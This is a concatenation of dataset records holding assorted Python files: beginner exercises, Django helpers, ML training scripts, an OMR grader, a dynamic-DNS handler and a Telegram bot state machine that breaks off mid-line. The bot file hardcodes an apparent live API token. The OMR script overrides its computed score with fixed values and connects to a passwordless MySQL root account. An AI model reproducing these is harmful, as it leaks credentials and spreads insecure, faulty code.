powtórzy\n\t\tprint(\"Liczba nie jest naturalna\") \n\t\tm = int(input(\"Podaj liczbę naturalną \"))\n\t\n\t\n\t\n\t\n\t\n\t\n\tfor i in range(n, m + 1): # Funckcja pobiera zmienne n i m ustawia je jako pierwszą i drugą cyfrę zbioru i wyposuje je \n\t\n\t\tprint (i,\" \", end =\" \")\n\t\n\t\n\t\n \n\nif __name__ == '__main__':\n import sys\n sys.exit(main(sys.argv))\n","sub_path":"Praca/1/cw2.py","file_name":"cw2.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"236268","text":"\"\"\"\n7.\tВ одномерном массиве целых чисел определить два наименьших элемента.\nОни могут быть как равны между собой (оба являться минимальными),\n так и различаться.\n\"\"\"\n\nfrom random import random\n\nN = 10\narr = [0] * N\nfor i in range(N):\n arr[i] = int(random() * 10)\n\nif arr[0] < arr[1]:\n min_1 = arr[0]\n min_2 = arr[1]\nelse:\n min_1 = arr[1]\n min_2 = arr[0]\nfor i in range(2, len(arr)):\n if arr[i] <= min_1:\n min_2 = min_1\n min_1 = arr[i]\n elif arr[i] < min_2:\n min_2 = arr[i]\nprint(arr)\nif min_1 == min_2:\n print(f'оба минимальных числа имеют значение: {min_1}')\nelse:\n print(f'Первое минимальное число = {min_1}, второе минимальное число = {min_2}')","sub_path":"Lesson_3/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"186550752","text":"import json, urllib2, re\nfrom cep.models import Endereco\nfrom restless.exceptions import NotFound\n\nclass EnderecoHelper:\n @staticmethod\n def keyExists(list, key, default):\n try:\n return list[key]\n except:\n return default\n\n @staticmethod\n def onlyNumbers(value):\n non_numeric = re.compile(r'[^\\d]+')\n return non_numeric.sub('', value)\n\n @staticmethod\n def get_data_from_postmon(zipcode):\n URL_CONSULTA = \"http://api.postmon.com.br/v1/cep/%s\" % zipcode\n jsonContent = urllib2.urlopen(URL_CONSULTA)\n if (jsonContent.getcode() == 404):\n raise NotFound('CEP NAO ENCONTRADO')\n\n return json.load(jsonContent)\n\n @staticmethod\n def create_endereco_from_postmon(jsonObject):\n return Endereco.objects.create(\n zipcode = EnderecoHelper.keyExists(jsonObject, \"cep\", \"\"),\n city = EnderecoHelper.keyExists(jsonObject, \"cidade\", \"\"),\n address = EnderecoHelper.keyExists(jsonObject, \"logradouro\", \"\"),\n neighborhood = EnderecoHelper.keyExists(jsonObject, \"bairro\", \"\"),\n state = EnderecoHelper.keyExists(jsonObject, \"estado\", \"\"),\n )\n\n @staticmethod\n def create_or_get_from_zipcode(zipcode):\n try:\n jsonObj = EnderecoHelper.get_data_from_postmon(zipcode)\n except:\n raise\n\n try:\n return Endereco.objects.get(zipcode=jsonObj[\"cep\"])\n except:\n return EnderecoHelper.create_endereco_from_postmon(jsonObj)\n\n @staticmethod\n def get_zipcode_or_404(zipcode):\n try:\n return Endereco.objects.get(zipcode=zipcode)\n except:\n raise NotFound('CEP NAO ENCONTRADO')\n","sub_path":"cep/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"14959631","text":"#!/usr/bin/env python3\n\nimport collections\n\nfrom ml.rl.preprocessing.normalization import NormalizationParameters\n\n\ndef default_normalizer(feats, min_value=None, max_value=None):\n normalization = collections.OrderedDict(\n [\n (\n feats[i],\n NormalizationParameters(\n feature_type=\"CONTINUOUS\",\n boxcox_lambda=None,\n boxcox_shift=0,\n mean=0,\n stddev=1,\n possible_values=None,\n quantiles=None,\n min_value=min_value,\n max_value=max_value,\n ),\n )\n for i in range(len(feats))\n ]\n )\n return normalization\n","sub_path":"ml/rl/test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"235591664","text":"# Copyright 2017 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nr\"\"\"Convert raw PASCAL dataset to TFRecord for object_detection.\nExample usage:\n ./create_pascal_tf_record --data_dir=/home/user/VOCdevkit \\\n --year=VOC2012 \\\n --output_path=/home/user/pascal.record\n\"\"\"\n\n# Slightly modified from the original version\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport hashlib\nimport io\nimport logging\nimport os\nimport re\nimport numpy as np\n\nfrom lxml import etree\nimport PIL.Image\nimport tensorflow as tf\n\nfrom utils import dataset_util\n\n\nflags = tf.app.flags\nflags.DEFINE_string('data_dir', '', 'Root directory to raw UECFOOD256 dataset.')\nflags.DEFINE_string('set', 'train', 'Convert training set, validation set or '\n 'merged set.')\nflags.DEFINE_string('images_dir', 'Images',\n '(Relative) path to images directory.')\nflags.DEFINE_string('annotations_dir', 'Annotations',\n '(Relative) path to annotations directory.')\nflags.DEFINE_string('output_path', '', 'Path to output TFRecord')\nflags.DEFINE_string('categories_path', 'data/categories.txt',\n 'Path to the list of categories')\nflags.DEFINE_boolean('ignore_difficult_instances', False, 'Whether to ignore '\n 'difficult instances')\nFLAGS = flags.FLAGS\n\nSETS = ['train', 'val', 'trainval', 'test']\n\n\ndef dict_to_tf_example(data,\n dataset_directory,\n categories,\n ignore_difficult_instances=False,\n image_subdirectory='Images'):\n \"\"\"Convert XML derived dict to tf.Example proto.\n Notice that this function normalizes the bounding box coordinates provided\n by the raw data.\n Args:\n data: dict holding PASCAL XML fields for a single image (obtained by\n running dataset_util.recursive_parse_xml_to_dict)\n dataset_directory: Path to root directory holding PASCAL dataset\n label_map_dict: A map from string label names to integers ids.\n ignore_difficult_instances: Whether to skip difficult instances in the\n dataset (default: False).\n image_subdirectory: String specifying subdirectory within the\n PASCAL dataset directory holding the actual image data.\n Returns:\n example: The converted tf.Example.\n Raises:\n ValueError: if the image pointed to by data['filename'] is not a valid JPEG\n \"\"\"\n img_path = os.path.join(data['data_dir'], data['filename'])\n full_path = os.path.join(dataset_directory, img_path)\n with tf.gfile.GFile(full_path, 'rb') as fid:\n encoded_jpg = fid.read()\n encoded_jpg_io = io.BytesIO(encoded_jpg)\n image = PIL.Image.open(encoded_jpg_io)\n if image.format != 'JPEG':\n raise ValueError('Image format not JPEG')\n key = hashlib.sha256(encoded_jpg).hexdigest()\n\n # Image characteristics\n width, height = PIL.Image.open(img_path).size\n\n xmin = []\n ymin = []\n xmax = []\n ymax = []\n classes = []\n classes_text = []\n for ix, obj in enumerate(data['boxes']):\n xmin.append(np.clip(float(obj[0]) / width, 0, 1))\n ymin.append(np.clip(float(obj[1]) / height, 0, 1))\n xmax.append(np.clip(float(obj[2]) / width, 0, 1))\n ymax.append(np.clip(float(obj[3]) / height, 0, 1))\n classes_text.append(categories[int(data['labels'][ix])-1])\n classes.append(int(data['labels'][ix]))\n\n example = tf.train.Example(features=tf.train.Features(feature={\n 'image/height': dataset_util.int64_feature(height),\n 'image/width': dataset_util.int64_feature(width),\n 'image/filename': dataset_util.bytes_feature(\n data['filename'].encode('utf8')),\n 'image/source_id': dataset_util.bytes_feature(\n data['filename'].encode('utf8')),\n 'image/key/sha256': dataset_util.bytes_feature(key.encode('utf8')),\n 'image/encoded': dataset_util.bytes_feature(encoded_jpg),\n 'image/format': dataset_util.bytes_feature('jpeg'.encode('utf8')),\n 'image/object/bbox/xmin': dataset_util.float_list_feature(xmin),\n 'image/object/bbox/xmax': dataset_util.float_list_feature(xmax),\n 'image/object/bbox/ymin': dataset_util.float_list_feature(ymin),\n 'image/object/bbox/ymax': dataset_util.float_list_feature(ymax),\n 'image/object/class/text': dataset_util.bytes_list_feature(classes_text),\n 'image/object/class/label': dataset_util.int64_list_feature(classes),\n }))\n return example\n\n\ndef main(_):\n if FLAGS.set not in SETS:\n raise ValueError('set must be in : {}'.format(SETS))\n \n data_dir = FLAGS.data_dir\n\n writer = tf.python_io.TFRecordWriter(FLAGS.output_path)\n\n categories = [line.rstrip('\\n') for line in open(FLAGS.categories_path)]\n\n logging.info('Reading from UECFOOD256 dataset.')\n list_set_path = os.path.join(data_dir, 'ImageSets', FLAGS.set + '.txt')\n images_dir = os.path.join(data_dir, FLAGS.images_dir)\n annotations_dir = os.path.join(data_dir, FLAGS.annotations_dir)\n list_set = dataset_util.read_examples_list(list_set_path)\n for idx, example in enumerate(list_set):\n if idx % 100 == 0:\n logging.info('On image %d of %d', idx, len(list_set))\n\n # Annotation characteristics\n ann_path = os.path.join(annotations_dir, example + '.txt')\n\n # Read annots\n data = [line.rstrip('\\n').split() for line in open(ann_path)]\n bboxes = []\n labels = []\n for obj in data:\n labels.append(float(obj[0]))\n bboxes.append([float(obj[1]), float(obj[2]), \n float(obj[3]), float(obj[4])])\n\n data = {\n 'data_dir': images_dir, \n 'filename': example + '.jpg', \n 'boxes': bboxes, \n 'labels': labels, \n }\n\n tf_example = dict_to_tf_example(data, FLAGS.data_dir, categories,\n FLAGS.ignore_difficult_instances)\n writer.write(tf_example.SerializeToString())\n\n writer.close()\n\n\nif __name__ == '__main__':\n tf.app.run()\n\n","sub_path":"builders/UECFOOD256/create_tf_records.py","file_name":"create_tf_records.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"161459090","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 13 22:34:35 2020\n\n@author: ASUS\n\"\"\"\n\nfrom imutils.perspective import four_point_transform\nfrom imutils import contours\nimport numpy as np\nfrom numpy import array\nimport argparse as ap\nimport imutils as imtl\nimport cv2 as cv\nimport dewapper\nimport generate_answer\nimport generate_roll\n##############################################################################\nimg = cv.imread('images/pic36.jpg')\nwarpe = dewapper.dewarp_book(img)\n\nroll=generate_roll.get_roll(warpe)\nprint(roll)\n#answer=generate_answer.get_answer(warpe)\nanswer=[1, 2, 1, 2, 0, 1, 2, 1, 1, 3, 2, 2, 0, 1, 1, 1, 3, 0, 0, 1, 2, 1, 2, 3, 3, 1, 0, 2, 1, 3, 0, 3, 0, 2, 1]\n#answer = array(answer)\nprint(answer)\n\nimg = cv.imread('images/pic36.jpg')\nwarped = dewapper.dewarp_book(img)\n\ngray=cv.cvtColor(warped,cv.COLOR_BGR2GRAY)\nblurred=cv.GaussianBlur(gray,(5,5),0)\nedged=cv.Canny(blurred,75,200)\n# Declaring the array of answers // index = question number // Value = answer number ( 0=A , 1=B , 2=C , 3=D ) \n\n\n# Total question number\nbblcnt=35\n#\n# For checking the total processed answer.\nbblchkcnt=0\n#\n##############################################################################\n\n\n\n##############################################################################\nret, thresh = cv.threshold(gray, 127, 255, 0)\ncntr, hierarchy = cv.findContours(thresh, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n#cnt=cv.drawContours(warped, cntr, -1, (0,255,0), 2)\n\n#The outer box of the qustions//Pretended to be 2 box in the OMR sheet\nboxcnts = []\n#\nfor c in cntr:\n (x , y , w , h) = cv.boundingRect(c)\n ar = w/float(h)\n if w>=800 and h>=3500 and ar>=0.20 and ar<=0.30:\n boxcnts.append(c)\n#print(len(boxcnts))\n\ncnt=cv.drawContours(warped, boxcnts, -1, (0,255,0), 20)\ncv.namedWindow('bubble outer box image', cv.WINDOW_NORMAL) \ncv.resizeWindow('bubble outer box image', 1080, 720) \ncv.imshow(\"bubble outer box image\", cnt )\n#cv.imshow(\"warped image\", boximg[0] )\ncv.waitKey(0)\ncv.destroyAllWindows()\n\nboxcnts = contours.sort_contours(boxcnts)[0]\n##############################################################################\n\n\n\n##############################################################################\n# for storing the box images from contours\nboximg=[]\n\nfor c in boxcnts:\n (x , y , w , h) = cv.boundingRect(c)\n boxcnt=warped[y:y+h,x:x+w]\n boximg.append(boxcnt)\ncorrect=0\ncoun=0\nfor d in range(len(boximg)):\n #print(d)\n gray=cv.cvtColor(boximg[d],cv.COLOR_BGR2GRAY)\n thresh = cv.threshold(gray, 0, 255, cv.THRESH_BINARY_INV | cv.THRESH_OTSU)[1]\n cnts,hierarchy = cv.findContours(thresh.copy(),cv.RETR_LIST,cv.CHAIN_APPROX_SIMPLE)\n \n #cnt=cv.drawContours(warped, boxcnts, -1, (0,255,0), 2)\n cv.namedWindow('bubble outer box thresh', cv.WINDOW_NORMAL) \n cv.resizeWindow('bubble outer box thresh', 1080, 720) \n cv.imshow(\"bubble outer box thresh\", thresh )\n #cv.imshow(\"warped image\", boximg[0] )\n cv.waitKey(0)\n cv.destroyAllWindows()\n\n bubbles=[]\n for c in cnts:\n (x , y , w , h) = cv.boundingRect(c)\n ar = w/float(h)\n if w>=105 and w<=130 and h>=105 and h<=130 and ar>=0.9 and ar<=1.2:\n bubbles.append(c)\n cnt=cv.drawContours(boximg[d],bubbles, -1, (0,255,0), 3)\n #print(len(bubbles))\n #qncn=len(bubbles)/4\n\n\n bubbles = contours.sort_contours(bubbles,method=\"top-to-bottom\")[0]\n for (q,i) in enumerate(np.arange(0 , len(bubbles), 4),coun):\n cnts = contours.sort_contours(bubbles[i:i+4])[0]\n bubbled = None\n for (j , c) in enumerate(cnts):\n mask = np.zeros(thresh.shape, dtype=\"uint8\")\n cv.drawContours(mask , [c] , -1, 255, -1)\n mask = cv.bitwise_and(thresh , thresh , mask= mask) \n '''cv.namedWindow('mask of each bubble', cv.WINDOW_NORMAL) \n cv.resizeWindow('mask of each bubble', 1080, 720) \n #cv.imshow(\"warped image\", warped )\n cv.imshow(\"mask of each bubble\",mask)\n cv.waitKey(0)\n cv.destroyAllWindows()'''\n total = cv.countNonZero(mask)\n #print(total)\n if bubbled is None or total > bubbled[0]:\n bubbled = (total , j)\n color = (0, 0, 255)\n #ansq = coun+q\n #print(q)\n if(q>34):\n break\n k = answer[q]\n if(k==bubbled[1]):\n color = (0,240,0)\n correct += 1\n cv.drawContours(boximg[d], [cnts[k]], -1, color, 20)\n coun=25\n\nprint(correct)\n\nscore = correct\nprint(\"[INFO] score: {:.2f}\".format(score))\ncv.putText(warped, \"{:.2f}\".format(score), (2887, 3826),\n\tcv.FONT_HERSHEY_SIMPLEX, 5, (255, 0,0 ), 20)\ncv.putText(warped, \"{:.0f}\".format(int(roll)), (2898, 1005),\n\tcv.FONT_HERSHEY_SIMPLEX, 5, (255, 0,0 ), 20)\n\nroll=1604092\ncorrect = 25\nimport mysql.connector\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"\",\n database=\"omr\"\n)\nmycursor = mydb.cursor()\n\nsql = \"INSERT INTO Marks (roll, mark) VALUES (%s,%s)\"\nval=(int(roll),int(correct))\n\nmycursor.execute(sql,val)\n\nmydb.commit()\n\ncv.namedWindow('warped image', cv.WINDOW_NORMAL) \ncv.resizeWindow('warped image', 1080, 720) \ncv.imshow(\"warped image\", warped )\n#cv.imshow(\"warped image\", boximg[0] )\ncv.waitKey(0)\ncv.destroyAllWindows()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"307470225","text":"\"\"\"\nApprove or lock objects from the database\n\"\"\"\nimport logging\n\nfrom dateutil.relativedelta import relativedelta\n\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom results.models.competitions import Competition\nfrom results.models.events import Event\nfrom results.models.records import Record\nfrom results.models.results import Result\n\nlogger = logging.getLogger(__name__)\n\n\ndef _check_requirements(result):\n competition = result.competition\n if result.athlete:\n athletes = [result.athlete]\n else:\n athletes = result.team_members.all()\n for requirement in competition.type.requirements.split(',') + competition.level.requirements.split(','):\n if requirement.strip():\n for athlete in athletes:\n if not athlete.organization.external and not athlete.info.filter(\n type=requirement.strip(),\n date_start__lte=competition.date_start,\n date_end__gte=competition.date_start).count():\n return False\n return True\n\n\nclass Command(BaseCommand):\n list_only = False\n check_requirements = False\n verbosity = 0\n\n def add_arguments(self, parser):\n parser.add_argument('-d', type=int, action='store', dest='days',\n help='Date limit for approval or locking, default 30.')\n parser.add_argument('--result', action='store_true', dest='approve_results',\n help='Approve results which have not been modified during date limit')\n parser.add_argument('--record', action='store_true', dest='approve_records',\n help='Approve records which have not been modified during date limit')\n parser.add_argument('--event', action='store_true', dest='lock_events',\n help='Lock past events which have not been modified during date limit')\n parser.add_argument('--competition', action='store_true', dest='lock_competitions',\n help='Lock past competitions which have not been modified during date limit')\n parser.add_argument('-r', action='store_true', dest='check_requirements',\n help='Check competition type and level requirements for result approval')\n parser.add_argument('-l', action='store_true', dest='list_only',\n help='List only, do not approve')\n\n def output(self, text):\n if self.list_only:\n self.stdout.write(\"(List only) \" + text)\n else:\n if self.verbosity:\n self.stdout.write(text)\n logger.info(text)\n\n def approve_results(self, date_limit):\n \"\"\" Approve results which have not been modified during date limits\"\"\"\n for result in Result.objects.filter(updated_at__lt=date_limit, approved=False):\n if _check_requirements(result):\n result.approved = True\n self.output(\"Result approved: %s\" % result)\n if not self.list_only:\n result.save()\n else:\n self.output(\"Requirements not met: %s\" % result)\n\n def approve_records(self, date_limit):\n \"\"\" Approve records which have not been modified during date limits\"\"\"\n for record in Record.objects.filter(updated_at__lt=date_limit, approved=False):\n record.approved = True\n self.output(\"Record approved: %s\" % record)\n if not self.list_only:\n record.save()\n\n def lock_competitions(self, date_limit):\n \"\"\"Lock past competitions which have not been modified during date limit\"\"\"\n for competition in Competition.objects.filter(date_end__lte=date_limit,\n updated_at__lt=date_limit,\n locked=False):\n if Result.objects.filter(\n competition=competition, updated_at__lt=date_limit).exclude(approved=True).count() == 0:\n competition.locked = True\n self.output(\"Competition locked: %s\" % competition)\n if not self.list_only:\n competition.save()\n\n def lock_events(self, date_limit):\n \"\"\"Lock past events which have not been modified during date limit\"\"\"\n for event in Event.objects.filter(date_end__lte=date_limit,\n updated_at__lt=date_limit,\n locked=False):\n if Competition.objects.filter(event=event, updated_at__lt=date_limit).exclude(locked=True).count() == 0:\n event.locked = True\n self.output(\"Event locked: %s\" % event)\n if not self.list_only:\n event.save()\n\n def handle(self, *args, **options):\n days = options['days']\n approve_results = options['approve_results']\n approve_records = options['approve_records']\n lock_competitions = options['lock_competitions']\n lock_events = options['lock_events']\n self.verbosity = options['verbosity']\n self.list_only = options['list_only']\n # Set date range to one year if not given\n if days is None:\n days = 30\n if days >= 0:\n date_limit = timezone.now() - relativedelta(days=days)\n if approve_results:\n self.approve_results(date_limit)\n if approve_records:\n self.approve_records(date_limit)\n if lock_competitions:\n self.lock_competitions(date_limit)\n if lock_events:\n self.lock_events(date_limit)\n else:\n self.stderr.write(\"Error: -d must be positive\")","sub_path":"results/management/commands/approve.py","file_name":"approve.py","file_ext":"py","file_size_in_byte":5798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"519812852","text":"\"\"\"verify_hue_running.py: Script for Hue initialization action test.\n\"\"\"\n\n# This file was provided by Google.\n# Added feature to pass expected_version as it's different on 1.0 1.1 and 1.2\n\nimport requests\nimport socket\n\nBASE = 'localhost'\nPORT = 8888\n\n\n\nclass HueApi(object):\n def __init__(self, base, port):\n self.base = 'http://{}:{}'.format(base, port)\n self.host = socket.gethostname()\n\n def get_homepage(self):\n path = '/accounts/login/?next=/'\n try:\n r = requests.get(self.base + path)\n if r.status_code < 300:\n print(\"OK - Hue UI is running on master node\")\n else:\n raise Exception('NOK - Could not find service UI running')\n except requests.exceptions.RequestException:\n if '-w-' in self.host:\n print(\"OK - Hue is not running on worker node\")\n else:\n print(\"CONNECTION ERROR\")\n\ndef main():\n \"\"\"Drives the script.\n\n Returns:\n None\n\n Raises:\n Exception: If a response does not contain the expected value\n \"\"\"\n hueApi = HueApi(BASE,PORT)\n res = hueApi.get_homepage()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"testing-scripts/hue/verify_hue_running.py","file_name":"verify_hue_running.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"99038174","text":"#!/usr/bin/python\n#-*- coding:utf8 -*-\n# Desgin By Xiaok\nfrom xk_application.xk_main import *\n\nclass DynHandler(BaseHandler):\n def get(self,*args):\n #print args # 传入了一个login的参数进来了\n self.post(self,*args);\n\n def post(self,*args):\n username = self.get_argument('username')\n password = self.get_argument('password')\n \n domain = self.get_argument('domain')\n record = self.get_argument('record')\n typename = self.get_argument('typename')\n\n user = self.db.get('''select id,username,status from xk_users where username = %s and password = md5(%s)''',username,password)\n if user:\n if user['status'] == 'no':\n self.write('''用户已禁用, 请联系管理员!''')\n return\n else:\n self.write('''用户名或密码错误!''')\n return\n # 获取客户端信息,并写入登录日志\n headers = self.request.headers\n login_host = self.request.remote_ip\n #login_host = \"210.75.225.254\" # For Test and Debug\n user_agent = headers.get('User-Agent')\n # 写登录日志\n self.db.execute(''' insert into xk_login_logs (uid,username,login_host,user_agent) values (%s,%s,%s,%s) ''',user['id'],user['username'],login_host,user_agent)\n \n #domain is exit\n _domain = self.db.get(\"select id,domain from xk_domain where status = 'yes' and domain = %s\", domain)\n if _domain:\n _record = self.db.get(\"select id,value,did from xk_record where record = %s and type = %s and did=%s\", record,typename,_domain['id'])\n if _record:\n #record exist,check ip,if change, then update and restrat dns server\n if _record['value'] == login_host:\n \n return\n else:\n self.db.execute(''' update xk_record set value=%s where id=%s and did=%s ''',login_host,_record['id'],_domain['id'])\n self.redirect(\"/public/api?module=dnsmasq&fun=update&id=\"+str(_record['did'])+\"&force=yes\")\n \n return\n \n else:\n #record not exist,insert and restart dns server\n did = _domain['id']\n record = self.get_argument(\"record\")\n type = self.get_argument(\"typename\")\n value = login_host\n priority = self.get_argument(\"priority\",0)\n comment = \"auto create dns\"\n \n if type == \"MX\":\n priority = int(priority)\n else:\n priority = None\n \n self.db.execute(\"insert into xk_record (did,record,type,value,priority,comment,create_time) values (%s,%s,%s,%s,%s,%s,%s)\",did,record,type,value,priority,comment,self.get_time())\n #self.write(\"1\")\n self.redirect(\"/public/api?module=dnsmasq&fun=update&id=\"+str(did)+\"&force=no\")\n return \n else:\n self.write(\"domain [\"+domain+\"] is not exist\")\n return\n \n \n \n","sub_path":"xk_handler/xk_dyn_dns.py","file_name":"xk_dyn_dns.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"449515260","text":"# Larger CNN for the MNIST Dataset\nimport numpy\n\nfrom matplotlib import pyplot\nfrom scipy.misc import toimage\nimport matplotlib.pyplot as plt\n\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import Flatten\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.convolutional import MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras import backend as K\nK.set_image_dim_ordering('th')\n\n# fix random seed for reproducibility\nseed = 7\nnumpy.random.seed(seed)\n\n# load data\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\n# reshape to be [samples][pixels][width][height]\nX_train = X_train.reshape(X_train.shape[0], 1, 28, 28).astype('float32')\nX_test = X_test.reshape(X_test.shape[0], 1, 28, 28).astype('float32')\n\n# normalize inputs from 0-255 to 0-1\nX_train = X_train / 255\nX_test = X_test / 255\n\n# one hot encode outputs\ny_train = np_utils.to_categorical(y_train)\ny_test = np_utils.to_categorical(y_test)\nnum_classes = y_test.shape[1]\n\n\n# define the larger model\ndef larger_model():\n\t# create model\n\tmodel = Sequential()\n\tmodel.add(Conv2D(30, (5, 5), input_shape=(1, 28, 28), activation='relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\tmodel.add(Conv2D(15, (3, 3), activation='relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\tmodel.add(Dropout(0.2))\n\tmodel.add(Flatten())\n\tmodel.add(Dense(128, activation='relu'))\n\tmodel.add(Dense(50, activation='relu'))\n\tmodel.add(Dense(num_classes, activation='softmax'))\n\t# Compile model\n\tmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\treturn model\n\n\n\n# build the model\nmodel = larger_model()\n\n# Fit the model\nhistory = model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=2, batch_size=200)\n\n# list all history\nprint(history.history.keys())\n\nprint(history.history['acc'])\nprint(history.history['val_acc'])\n\n# Final evaluation of the model\nscores = model.evaluate(X_test, y_test, verbose=0)\nprint(\"Large CNN Error: %.2f%%\" % (100-scores[1]*100))\n\n\n\n\nif __name__ == '__main__':\n \n #imgs = load_and_scale_imgs()\n #predictions = model.predict_classes(imgs)\n #print(predictions)\n \n\n # summarize history for accuracy\n plt.plot(history.history['val_acc'])\n plt.plot(history.history['acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n\n # summarize history for loss\n plt.plot(history.history['val_loss'])\n plt.plot(history.history['loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"19045923","text":"def add(j):\n A=[]\n A=j\n c=input('想輸入的果汁?')\n if c in j:\n print('已經有了')\n else:\n A.append(c)\n print('已新增')\n return A\n\ndef show(j):\n b=[]\n print(j)\n b=j\n return b\n\ndef remove(j):\n e=[]\n e=j\n c=input('想刪除的果汁?')\n if c in j:\n e.remove(c)\n print('已刪除')\n else:\n print('無此果汁')\n return e\n\nj=[]\nw=[add,show,remove]\nwhile True:\n print('1. 想加入菜單的果汁')\n print('2. 顯示目前所有果汁')\n print('3. 刪除菜單上的果汁')\n print('4. 離開系統')\n a=int(input('請選擇功能'))\n if a==4:\n break\n else:\n j=w[a-1](j)","sub_path":"20210727/class/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"147042131","text":"import sys\nfrom io import BytesIO\n\nimport telegram\nfrom flask import Flask, request, send_file\n\nfrom fsm import TocMachine\n\n\nAPI_TOKEN = '336600070:AAH3oZzwf9xHxF4nYHdv2BXj1Rv5Kw2xYA8'\nWEBHOOK_URL = 'https://b92ef005.ngrok.io/hook'\n\napp = Flask(__name__)\nbot = telegram.Bot(token=API_TOKEN)\nmachine = TocMachine(\n states=[\n 'init',\n 'user',\n 'talk',\n 'sorry',\n 'suck',\n 'play',\n 'east',\n 'animal',\n 'animalDetail',\n 'west',\n 'astro',\n 'astroDetail',\n 'math',\n 'matheq',\n 'mathneq'\n ],\n transitions=[\n {\n 'trigger': 'advance',\n 'source': 'init',\n 'dest': 'user'\n },\n {\n 'trigger': 'advance',\n 'source': 'user',\n 'dest': 'talk',\n 'conditions': 'is_going_to_talk'\n },\n {\n 'trigger': 'advance',\n 'source': 'talk',\n 'dest': 'sorry',\n 'conditions': 'is_going_to_sorry'\n },\n {\n 'trigger': 'advance',\n 'source': 'talk',\n 'dest': 'suck',\n 'conditions': 'is_going_to_suck'\n },\n {\n 'trigger': 'advance',\n 'source': 'user',\n 'dest': 'play',\n 'conditions': 'is_going_to_play'\n },\n {\n 'trigger': 'advance',\n 'source': 'play',\n 'dest': 'west',\n 'conditions': 'is_going_to_west'\n },\n {\n 'trigger': 'advance',\n 'source': 'west',\n 'dest': 'astro',\n 'conditions': 'is_going_to_astro'\n },\n {\n 'trigger': 'advance',\n 'source': 'astro',\n 'dest': 'astroDetail',\n 'conditions': 'is_going_to_astroDetail'\n },\n {\n 'trigger': 'advance',\n 'source': 'play',\n 'dest': 'east',\n 'conditions': 'is_going_to_east'\n },\n {\n 'trigger': 'advance',\n 'source': 'east',\n 'dest': 'animal',\n 'conditions': 'is_going_to_animal'\n },\n {\n 'trigger': 'advance',\n 'source': 'animal',\n 'dest': 'animalDetail',\n 'conditions': 'is_going_to_animalDetail'\n },\n {\n 'trigger': 'advance',\n 'source': 'animalDetail',\n 'dest': 'animalDetail',\n 'conditions': 'is_going_to_animalDetail'\n },\n {\n 'trigger': 'advance',\n 'source': 'animalDetail',\n 'dest': 'user',\n 'conditions': 'is_going_out_animalDetail'\n },\n {\n 'trigger': 'advance',\n 'source': 'user',\n 'dest': 'math',\n 'conditions': 'is_going_to_math'\n },\n {\n 'trigger': 'advance',\n 'source': 'math',\n 'dest': 'matheq',\n 'conditions': 'is_going_to_matheq'\n },\n {\n 'trigger': 'advance',\n 'source': 'math',\n 'dest': 'mathneq',\n 'conditions': 'is_going_to_mathneq'\n },\n {\n 'trigger': 'go_back',\n 'source': [\n 'sorry',\n 'suck',\n 'astroDetail',\n 'matheq',\n 'mathneq'\n ],\n 'dest': 'user'\n }\n ],\n initial='init',\n auto_transitions=True,\n show_conditions=True,\n)\n\n\ndef _set_webhook():\n status = bot.set_webhook(WEBHOOK_URL)\n if not status:\n print('Webhook setup failed')\n sys.exit(1)\n else:\n print('Your webhook URL has been set to 